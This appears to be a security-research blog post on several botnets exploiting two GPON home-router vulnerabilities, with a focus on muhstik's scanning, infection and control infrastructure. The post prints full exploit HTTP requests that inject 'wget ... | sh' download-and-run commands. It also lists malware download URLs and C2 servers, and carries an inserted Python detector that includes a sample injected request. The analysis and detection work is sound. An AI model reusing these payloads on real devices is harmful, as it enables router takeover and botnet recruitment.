On May 1st, VPN Mentor disclosed two vulnerabilities in GPON home routers. Since then, at least 5 botnet families have been actively exploiting them to recruit bots, including mettle, muhstik, mirai, hajime and satori. It is the first time we have seen so many botnets competing for territory in such a short time.

Fortunately, the current attack payloads from muhstik, mirai, hajime and satori have been tested and found to be broken: they do not implant malicious code. Mettle's C2 server is now offline, although it did successfully complete implants while it was active. In any case, since these malware gangs are actively updating their code, we should remain vigilant about their behavior.

The Muhstik botnet was first disclosed in our blog (report-2018-04). This time the muhstik botnet has been updated with three new exploits, including one against GPON home routers, bringing its total to 10 exploits.

By May 9, we had taken joint action with the security community to shut down part of its servers, which slightly slowed its expansion. However, the muhstik gang did not stop expanding: at 2018-05-10 10:30 GMT+8 we noticed that it had enabled a new report server, 165.227.78.159, to replace the old one that was shut down. We are now following up with the security community.

Multiple Botnets are Actively Exploiting the Recently Exposed GPON Vulnerabilities

VPN Mentor disclosed two vulnerabilities in GPON home routers on 2018-05-01 (CVE-2018-10561, an authentication bypass, and CVE-2018-10562, a command execution vulnerability). After analyzing the published PoC, we determined that the exploit works and may have a wide impact, since botnets were expected to make use of it.

Starting from the next day (2018-05-02), we saw multiple botnets exploiting this vulnerability to expand their infections. As of 2018-05-10, we have observed 5 botnet families using this exploit.

These botnets are:

  • mettle: the attacker uses IP addresses in Viet Nam (C2 210.245.26.180:4441, scanner 118.70.80.143) and the open-sourced Mettle attack module to implant malware. This is the first time we have observed this botnet.
  • muhstik: we first disclosed this botnet last month (report-2018-04). In its latest update, Muhstik added exploits for three vulnerabilities: GPON (CVE-2018-10561, CVE-2018-10562), JBoss (CVE-2007-1036) and DD-WRT (web authentication brute-forcing).
  • Mirai (more than one variant): since its source code was released in 2016-09, the mirai botnet has been used by hundreds of malicious gangs. This time we observe that more than one group is actively using this exploit to deliver their mirai variants.
  • hajime: we have released two reports on the Hajime botnet (Report-2017-09, Briefing-2018-03). Hajime was also updated this time and began to infect GPON devices.
  • satori: the satori botnet was also first disclosed by us; it infected 260,000 devices in 12 hours in 2017-12 (report-2017-11, report-2017-12, report-2018-01). We observed that Satori also added the GPON exploit in its latest update.

We will focus on muhstik botnet in this blog.

Introduction to Muhstik Botnet

The figure above illustrates the structure of the Muhstik botnet:

  • Scanning phase: muhstik.scanner initiates scanning and exploits the vulnerability to force vulnerable GPON devices to report their status to the report server;
  • Infection phase: muhstik.infector exploits the vulnerability to force susceptible GPON devices to download malware from the download server and install it;
  • Control phase: muhstik.c2.list sends commands to its bots, instructing them to launch scanning, SSH scale-out, xmrig mining, cgminer mining or DDoS attacks.

Muhstik Botnet Update – Scan Phase

In this round, muhstik has added 3 new exploits, as follows:

  1. GPON (CVE-2018-10561 & CVE-2018-10562)
  2. JBoss (CVE-2007-1036)
  3. DD-WRT (web authentication brute-forcing)

The corresponding state report URLs are as follows:

hxxp://51.254.219.134/gpon.php?port=80|8080  #GPON RCE  
hxxp://51.254.219.134/jboss.php  #JBoss  
hxxp://51.254.219.134/ddwrt.php  #DD-WRT  

After the report server (51.254.219.134) was shut down by the security community, the report server IP address was updated to 165.227.78.159.

Now the report URLs are:

hxxp://165.227.78.159/gponb6abe42c3a9aa04216077697eb1bcd44.php?port=80|8080  
hxxp://128.199.251.119/gpon.php?port=80|8080  

Muhstik Botnet Update – Implant Phase

During the implant phase, muhstik tries to force the targeted GPON device to download the muhstik.tsunami malicious code and the muhstik.aioscan scanning module. The muhstik.loader IP address remains 51.254.219.137.

The scanning payloads for GPON are the following three requests:

POST /GponForm/diag_Form?images/ HTTP/1.1  
Cache-Control: no-cache  
Connection: keep-alive  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
Host: {target}  
Content-Type: text/plain  
Content-length: 121  
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO -http://51.254.219.134/gpon.php?port=80|8080&ipv=0  

POST /GponForm/diag_Form?images/ HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.4 Safari/532.2  
Content-Length: 113  
Content-Type: text/plain; charset=ISO-8859-1  
Host: {target}  
Connection: Keep-Alive  
Accept-Encoding: gzip,deflate  
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO -http://162.243.211.204/gpon | sh&ipv=0  

POST /GponForm/diag_Form?images/ HTTP/1.1  
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; da-DK; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13  
Content-Length: 112  
Content-Type: text/plain; charset=ISO-8859-1  
Host: {target}  
Connection: Keep-Alive  
Accept-Encoding: gzip,deflate  
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO -http://162.243.211.204/aio | sh&ipv=0  
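As an added example that is not part of the original post, the following Python detector applies the request shape shown above to HTTP log entries on the defender's side. It flags POSTs to /GponForm/diag_Form whose path carries the `?images/` authentication-bypass marker (CVE-2018-10561) and whose `dest_host` parameter contains shell metacharacters (CVE-2018-10562), extracts any report or download URLs from that parameter, and checks their hosts against the IoC hosts listed in this post. The sample requests are constructed for the example, and the function and variable names are assumptions of the example rather than anything from the original analysis.

```python
import re
from urllib.parse import unquote

# Report/download hosts taken from the IoC lists in this post.
KNOWN_MUHSTIK_HOSTS = {
    "51.254.219.134",   # old report server (shut down)
    "165.227.78.159",   # new report server
    "128.199.251.119",  # report server
    "162.243.211.204",  # muhstik download server
    "51.254.221.129",   # muhstik download server
}

GPON_DIAG_PATH = "/GponForm/diag_Form"
AUTH_BYPASS_MARKER = "?images/"       # CVE-2018-10561: path suffix that skips the login check
SHELL_META = re.compile(r"[;|`&$]")   # CVE-2018-10562: dest_host is handed to a shell
URL_RE = re.compile(r"https?://([0-9A-Za-z.\-]+)(?::\d+)?(?:/[^\s'\";]*)?")


def parse_body(body):
    """Parse a form-encoded request body into a dict (values URL-decoded)."""
    params = {}
    for part in body.split("&"):
        if "=" in part:
            key, value = part.split("=", 1)
            params[key] = unquote(value)
    return params


def analyze_request(request_line, body):
    """Return indicator flags and extracted URLs for one HTTP request."""
    findings = {
        "gpon_diag_form": False,
        "auth_bypass": False,
        "command_injection": False,
        "known_muhstik_host": False,
        "dropper_urls": [],
    }
    parts = request_line.split()
    if len(parts) < 2:
        return findings                      # malformed request line
    method, path = parts[0], parts[1]
    if method != "POST" or not path.startswith(GPON_DIAG_PATH):
        return findings
    findings["gpon_diag_form"] = True
    findings["auth_bypass"] = AUTH_BYPASS_MARKER in path
    params = parse_body(body)
    dest = params.get("dest_host", "")
    # A legitimate ping target is a host name or address, never shell syntax.
    if params.get("diag_action") == "ping" and SHELL_META.search(dest):
        findings["command_injection"] = True
    for match in URL_RE.finditer(dest):
        findings["dropper_urls"].append(match.group(0))
        if match.group(1) in KNOWN_MUHSTIK_HOSTS:
            findings["known_muhstik_host"] = True
    return findings


def classify(findings):
    """Collapse the flags into a single label for alerting."""
    if findings["command_injection"]:
        return "exploit-attempt"
    if findings["auth_bypass"]:
        return "auth-bypass-probe"
    if findings["gpon_diag_form"]:
        return "diag-form"
    return "benign"


def scan_log(requests):
    """Label every (request_line, body) pair in a captured log."""
    return [classify(analyze_request(line, body)) for line, body in requests]


# Constructed sample requests modelled on the payload shape shown in this post
# (192.0.2.10 is a documentation address used for the benign case).
SAMPLE_REQUESTS = [
    ("POST /GponForm/diag_Form?images/ HTTP/1.1",
     "XWebPageName=diag&diag_action=ping&wan_conlist=0"
     "&dest_host=wget;wget -qO - http://51.254.219.134/gpon.php?port=80|8080&ipv=0"),
    ("POST /GponForm/diag_Form HTTP/1.1",
     "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=192.0.2.10&ipv=0"),
    ("GET /index.html HTTP/1.1", ""),
]

if __name__ == "__main__":
    for (line, body), label in zip(SAMPLE_REQUESTS, scan_log(SAMPLE_REQUESTS)):
        print(f"{label:18} {line}")
        print("    ", analyze_request(line, body))
```

The two indicators are deliberately kept separate: a request with the `?images/` suffix but a clean `dest_host` is a probe for the bypass and worth logging, while shell metacharacters in `dest_host` on a ping form are the actual command injection and should page someone. Matching the extracted URL hosts against the IoC list attributes the attempt to muhstik, but the path and parameter checks fire regardless of which gang reuses the exploit.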

Muhstik Botnet Update – Malicious Samples

The GPON and JBoss exploits are buried in the aiomips sample (5C55D50C10F2B500B0FBCD4ADE2B18EA).

The DD-WRT exploit is in the aioarm sample (b9c8c709c89b2f9d864aa21164d25752).

Joint Actions with Security Community and Follow Ups

By May 9, we had taken joint action with the security community to shut down part of Muhstik's servers, which slightly slowed its expansion. The servers taken down include:

51.254.219.134    "AS16276 OVH SAS"  
191.238.234.227    "AS8075 Microsoft Corporation"  

However, muhstik's expansion did not stop. Currently (2018-05-10 10:30 GMT+8), we observe that it has enabled a new report server, 165.227.78.159, to replace the old one that was taken down.
We are taking follow-up action together with the security community.

New malware URLs

hxxp://165.227.78.159/gponb6abe42c3a9aa04216077697eb1bcd44.php   #report URL  
hxxp://162.243.211.204/gponexec         # muhstik.tsunami download URL  

IoC – muhstik

State Report URL List

hxxp://165.227.78.159/gponb6abe42c3a9aa04216077697eb1bcd44.php?port=80|8080  
hxxp://128.199.251.119/gpon.php?port=80|8080  

Malware Download URL List

hxxp://162.243.211.204/aio  
hxxp://162.243.211.204/gpon  
hxxp://162.243.211.204/nsshpftp  
hxxp://162.243.211.204/nsshcro  
hxxp://162.243.211.204/aiomips  
hxxp://210.245.26.180/arm  
hxxp://46.243.189.102/  
hxxp://162.243.211.204/gponexec  
hxxp://51.254.221.129/c/cron  
hxxp://51.254.221.129/c/tfti  
hxxp://51.254.221.129/c/pftp  
hxxp://51.254.221.129/c/ntpd  
hxxp://51.254.221.129/c/sshd  
hxxp://51.254.221.129/c/bash  
hxxp://51.254.221.129/c/pty  
hxxp://51.254.221.129/c/shy  
hxxp://51.254.221.129/c/nsshtfti  
hxxp://51.254.221.129/c/nsshcron  
hxxp://51.254.221.129/c/nsshpftp  
hxxp://51.254.221.129/c/fbsd  

C2 List

139.99.101.96:9090    AS16276 OVH SAS  
144.217.84.99:9090    AS16276 OVH SAS  
145.239.84.0:9090    AS16276 OVH SAS  
147.135.210.184:9090    AS16276 OVH SAS  
142.44.163.168:9090    AS16276 OVH SAS  
192.99.71.250:9090    AS16276 OVH SAS  
142.44.240.14:9090    AS16276 OVH SAS  
121.128.171.44:9090    AS4766 Korea Telecom    #Not active now  
66.70.190.236:9090    AS16276 OVH SAS #Not active now  
145.239.93.125:9090    AS16276 OVH SAS  
irc.de-zahlung.eu:9090        #Not active now  

All IP list

121.128.171.44:9090    AS4766 Korea Telecom    #Not active now  
139.99.101.96:9090    AS16276 OVH SAS  
142.44.163.168:9090    AS16276 OVH SAS  
142.44.240.14:9090    AS16276 OVH SAS  
144.217.84.99:9090    AS16276 OVH SAS  
145.239.84.0:9090    AS16276 OVH SAS  
145.239.93.125:9090    AS16276 OVH SAS  
147.135.210.184:9090    AS16276 OVH SAS  
162.243.211.204    "AS62567 DigitalOcean, LLC"  
165.227.78.159    "AS14061 DigitalOcean, LLC"  
192.99.71.250:9090    AS16276 OVH SAS  
210.245.26.180    "AS18403 The Corporation for Financing & Promoting Technology"  
46.243.189.102    "AS205406 Hostio Solutions B.V."  
51.254.221.129    "AS16276 OVH SAS"  
66.70.190.236:9090    AS16276 OVH SAS #Not active now  
irc.de-zahlung.eu:9090        #Not active now  
51.254.219.137    "AS16276 OVH SAS"  

IPs once under muhstik's control that have since been cleaned up by the security community

51.254.219.134    "AS16276 OVH SAS"  
191.238.234.227    "AS8075 Microsoft Corporation"  

IoC – mettle

C2 and Scanner

210.245.26.180    "AS18403 The Corporation for Financing & Promoting Technology"  
118.70.80.143    "AS18403 The Corporation for Financing & Promoting Technology"  

Source: Hacker News